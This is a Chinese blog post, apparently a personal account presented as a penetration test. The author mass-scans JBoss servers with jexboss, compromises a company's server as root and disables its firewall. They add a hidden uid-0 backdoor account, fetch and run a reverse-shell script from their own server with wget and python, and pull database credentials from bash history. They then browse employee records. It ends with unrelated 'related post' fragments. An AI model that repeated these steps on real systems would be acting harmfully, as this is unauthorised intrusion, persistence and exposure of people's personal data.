記一次曲折的滲透測試經歷
昨天把jexboss指令碼整合到我的多執行緒框架裡,掃了一遍全國jboss,發現一千多個shell.
隨意拿了一個看似大廠商的,作本次入侵測試
發現傳送門
通過jexboss拿到shell,看到是centos的機器(IP已打碼).
看起來是root,確認一下.
不穩定的傳送門
shell的問題
接下來執行命令的時候,發現這個jexboss自帶的shell很不穩定.出現各種問題,包括但不限於以下兩個嚴重問題:
- 執行有互動的命令時,程式會崩潰退出.比如說:cat命令會正常回顯,但是vi命令會導致shell直接報錯退出.
- 命令錯誤時,無回顯
只好自己再做個穩定的shell
nc的嘗試
看到系統有nc.我想簡單用nc彈個穩定的shell回來,發現我提交的所有nc命令都沒有回顯,且連不上shell.
Py的嘗試
放棄了nc,看看系統有沒有python,結果還是--version
沒回顯,但是有-h
然後我又想用py彈個shell回來,用了這段程式碼,發現也沒有成功,有點古怪.
我又執行了一句簡單的print,仍然沒有回顯!
why?
這裡我思考了一下,如果它是因為報錯了才無回顯.那麼能引起報錯的應該是程式碼中( ) ' "
等特殊字元在傳輸過程出現了錯誤.
我又用幾個簡單的shell程式碼具體測試了一下,證實猜測:
- 含有'
"
|
>
>>
&
等特殊字元的命令,均不能執行.且沒有回顯
這意味著?
這意味著我基本不能通過這個shell執行含有非字母字元的命令了!
不能使用nc,不能使用python,管道,重定向都不行了
SSH的嘗試
看來這個shell基本是廢的.看了下程序,埠,以及iptables
防火牆,發現一些針對性的配置,說明還是部署了一些安全防禦的.看到22埠後,我果斷關了防火牆.我新建個使用者,然後外面用ssh連不就OK了麼
於是我新建了一個管理員使用者
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php
查看了一下/etc/passwd
然後在修改其密碼時
passwd php
沒有回顯!!!
我想起來,這個修改密碼的動作是要使用者互動幾次的.之前說過,執行互動的命令都是報錯退出,沒回顯..所以又完蛋了
一般ssh都不會允許空密碼連線的,我試了一下,結果像這樣.
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused
我檢視下ssh的配置檔案cat /etc/ssh/sshd_config
結果如下:
# $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
Port 2525
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
除了配置檔案裡禁止了空密碼登入外,管理員還把ssh的預設埠改成了2525,可以可以
於是我在配置檔案里加一句話,允許空密碼登入不就OK了麼.
然而我在寫命令時,不能用非字母字元!還不能使用編輯器互動!
vi直接崩,sed不行,echo重定向也不行...
穩定的傳送門
根據這個辣雞shell的臊性,看來我是很難往系統裡寫入東西了,於是在外部下載程式碼本地執行總可以的吧,反正有Python了.
wget xxx.xxx.xxx
這個命令沒有特殊字元!應該可以執行
寫了個指令碼掛在我的伺服器上,再從目標機wget到本地.
ls出來的時候,我就炸了!
果斷python shell.py
,看到那個sh-4.1
出來的時候就知道搞定了!
然後改了我建立使用者的密碼,外部ssh連線,傳送門終於穩定下來.
逛逛資料庫
拿到穩定的shell,看看資料庫
試試在命令歷史中尋找相關命令:
cat ~/.bash_history |grep sql
結果如下,果然有貨
不費吹灰之力進了資料庫:
mysql裡面的命令列對我來說早就輕車熟路
use information_schema
select table_name,table_rows from tables where TABLE_SCHEMA = 'cloudcompany' order by table_rows desc;
管理員表:
都是員工資料(216條資料),來看一條:
挑一些有用的看看:
另外一個表(30W資料):
結語
看來資料庫沒太多東西.邊做邊寫文章效率太低,已經工作快四個小時了,內網什麼的不做了,交漏洞走人!
注:本文已遮蔽所有敏感資料,僅供技術交流,該入侵事件已提交烏雲漏洞平臺.
轉載請註明出處,並告知本人
mail: [email protected]
相關推薦
記一次曲折的滲透測試經歷
昨天把jexboss指令碼整合到我的多執行緒框架裡,掃了一遍全國jboss,發現一千多個shell. 隨意拿了一個看似大廠商的,作本次入侵測試 發現傳送門 通過jexboss拿到shell,看到是centos的機器(IP已打碼). 看起來是r
記一次克隆管理員的經歷
註冊表 克隆管理員半夜Server 2008R2安裝MS17-010補丁時,重啟系統 發現系統密碼忘記了還好本地登錄的安全策略留了一個guest用戶本地搭建了DVWA WEB滲透測試環境 權限為system通過漏洞上傳過狗一句話木馬木馬權限為system權限可以創建用戶 但是無法將用戶添加至管理員組
記一次Python爬蟲開發經歷
light 情況 獲取 數據類型 true charm req 是我 遇到 為啥要做Python爬蟲,是因為我去找電影的某個網站有點坑,它支持tag標簽查詢自己喜歡的電影,但是不支持雙標簽或者三標簽查詢。由於一個電影對應多種類型(tag),這就意味著,我需要進入這個電影介紹
記一次B站答題經歷
style sans spa ima .com 選擇題 科技 nbsp 結構 第一題部分:社區規範卷 --------- ------------ 第二題:社區規範第二部分 -------------------- 第三部分自由選擇題
記一次失敗的面試經歷
pub collect int 抽象 final 順序 多重 arr boolean 1. 前言 前幾天,濟南的一家公司來我們學校進行校招。工作室的創始人在那家公司混的還不錯,本來人家公司並沒有把我們學校作為被招聘的學校,是我們工作室的創始人極力推薦才來我們學校
記一次伺服器Tomcat優化經歷
公司需要一臺測試伺服器來做測試用,所以花了點時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,執行 ./catalina.sh run命令,在前臺列印執行資訊,首先看其有沒有報錯。好,沒有報錯,進行下一步。 1)修改你的jdk目錄下/
記一次生成pdf的經歷
繼上次踩完h5的坑後,迎來了新需求,需要生成pdf,內容包括封面,目錄,然後就是正文,正文的內容包括,頁首,頁尾,圖表,表格,圖片,地圖 最後實現的效果 封面 目錄 主體內容 使用的框架 jspdf (放棄) 在網上搜到有關於jspdf的問題
記一次msfconsole_android滲透實驗
1>檢視本機IP 2>生成App木馬 3>將生成的木馬安裝至手機 4>開啟msfconsole 1, user exploit/multi/handler 載入模組、 2, set payload android/meterpreter/reverse_tcp 選擇
記一次伺服器被黑經歷
從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更改
記一次伺服器被攻擊經歷
從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更
記一次掛馬清除經歷:處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬
昨天發現 一臺伺服器突然慢了 top 顯示 幾個程序100%以上的cpu使用 執行命令為 : /tmp/php -s /tmp/p2.conf 基本可以確定是被掛馬了 下一步確定來源 last 沒有登陸記錄 先幹掉這幾個程序,但是幾分鐘之後又出
記一次fis3+react開發經歷
前言: 雖然說是記錄fis3+react的一次開發經歷。但是在專案的上線前幾天收到公司TC委員會的郵件,因為react的開源協議讓找到react的替代方案,並且逐步下線線上的react專案。真的是可以用“出師未捷身先死”來形容這次開發了。 不過經過調研以後發
記一次百度面試經歷:
一、一面技術面:1、solr全文索引;2、寫一個二分查詢;3、HashMap資料結構(JDK1.8為紅黑樹->並未看1.8的原始碼)問的很細,最後會問桶下面只能有連結串列實現嗎?就是想問1.8的實現;4、MySQL優化和索引;5、spring的DI,IOC、AOP;6、
記一次開發平臺測試環境的安裝
如果 ria members 平臺 sam 社區 bind posit cat 1、查詢看系統版本 cat /etc/redhat-release 2、安裝openjdK yum -y install java-1.8.0-openjdk java-1.8.0-ope
記一次網站被黑經歷
blog http RoCE .proto lang 解決方法 protocol parent cti 問題原由 早上突然接到客戶電話,網站在微信中無法打開,被微信攔截 在pc端訪問網站,點擊首頁中任何一個url都會跳轉到第三方網站,恍然大悟,網站是被黑了 問題分析 發現網
記一次阿里巴巴一面經歷,作為一名java程式設計師終於找到了自己差距!
面試前的故事 上週在拉勾上收到一個螞蟻金服的大哥要我的簡歷,當時很驚訝,居然有螞蟻金服的找到我,然後想都沒想就給了。 受
網路爬蟲之記一次js逆向解密經歷
1 引言 數月前寫過某網站(請原諒我的掩耳盜鈴)的爬蟲,這兩天需要重新採集一次,用的是scrapy-redis框架,本以為二次爬取可以輕鬆完成的,可沒想到爬蟲啟動沒幾秒,出現了大堆的重試提示,心裡頓時就咯噔一下,悠閒時光估計要結束了。 仔細分析後,發現是獲取店鋪列表的請求出現問題,通過瀏覽器抓包,發現請求
記一次對`vulnhub`中`Android4`靶機滲透測試全過程
記一次對vulnhub中Android4靶機滲透測試全過程 Android4靶機簡介 名稱:Android4 作業系統:Android v4.4 標誌:/data/root/(在此目錄中) 等級:初學者。 搭建成功的Android平臺 知識點 埠掃描和IP發現 使用adb_server_exe
記一次阿裏電面經歷
art 存儲空間 自由 結束 eas 大型 特定 easy col 昨天下午(3/19)三點多鐘,接到了一個杭州的電話,是阿裏的。問我是否方便聊聊。我說我在上課,四點下課。然後他就四點多鐘的時候又打了一次過來。項目經歷上來就問我有無大型項目的經歷。不好意思,我說無。。。又
記一次服務器Tomcat優化經歷
type tomcat優化 ext stream jpg 試用 ros index ctp 博主原創,轉載請註明。 公司需要一臺測試服務器來做測試用,所以花了幾天時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,運